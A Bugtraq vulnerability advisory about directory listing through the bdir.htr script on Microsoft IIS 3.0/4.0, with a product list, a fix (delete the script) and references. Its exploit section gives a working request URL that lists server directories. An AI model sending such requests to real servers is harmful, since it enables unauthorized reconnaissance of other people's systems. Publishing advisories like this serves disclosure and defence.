BID:2280

Microsoft IIS 3.0/4.0 Upgrade BDIR.HTR Vulnerability

Info

Microsoft IIS 3.0/4.0 Upgrade BDIR.HTR Vulnerability

Bugtraq ID:	2280
Class:	Access Validation Error
CVE:
Remote:	Yes
Local:	Yes
Published:	Dec 25 1998 12:00AM
Updated:	Dec 25 1998 12:00AM
Credit:	Originally disclosed in Phrack Magazine issue 54 by rain forest puppy.
Vulnerable:	Microsoft IIS 4.0 + Cisco Building Broadband Service Manager (BBSM) 5.0 + Cisco Building Broadband Service Manager (BBSM) 5.0 + Cisco Call Manager 3.0 + Cisco Call Manager 3.0 + Cisco Call Manager 2.0 + Cisco Call Manager 2.0 + Cisco Call Manager 1.0 + Cisco Call Manager 1.0 + Cisco ICS 7750 + Cisco ICS 7750 + Cisco IP/VC 3540 Video Rate Matching Module + Cisco IP/VC 3540 Video Rate Matching Module + Cisco Unity Server 2.4 + Cisco Unity Server 2.4 + Cisco Unity Server 2.3 + Cisco Unity Server 2.3 + Cisco Unity Server 2.2 + Cisco Unity Server 2.2 + Cisco Unity Server 2.0 + Cisco Unity Server 2.0 + Cisco uOne 4.0 + Cisco uOne 4.0 + Cisco uOne 3.0 + Cisco uOne 3.0 + Cisco uOne 2.0 + Cisco uOne 2.0 + Cisco uOne 1.0 + Cisco uOne 1.0 + Hancom Hancom Office 2007 0 + Hancom Hancom Office 2007 0 + Microsoft BackOffice 4.5 + Microsoft BackOffice 4.5 + Microsoft Windows NT 4.0 Option Pack + Microsoft Windows NT 4.0 Option Pack Microsoft IIS 3.0 - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT 4.0 SP6 - Microsoft Windows NT 4.0 SP6 - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP4 - Microsoft Windows NT 4.0 SP4 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 - Microsoft Windows NT 4.0

Not Vulnerable:

Exploit / POC

Microsoft IIS 3.0/4.0 Upgrade BDIR.HTR Vulnerability

This can be exploited by requesting the following from the web server:

http://victim/scripts/iisadmin/bdir.htr??<path>

eg.,

http://www.victim-host.xxx/scripts/iisadmin/bdir.htr??d:\webs

Solution / Fix

Microsoft IIS 3.0/4.0 Upgrade BDIR.HTR Vulnerability

Solution:
Delete the script bdir.htr, it is not required for normal system function.

References

Microsoft IIS 3.0/4.0 Upgrade BDIR.HTR Vulnerability

References:

Comprehensive Windows NT Security (Richard Puckett)
Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 08 of 12 (Phrack)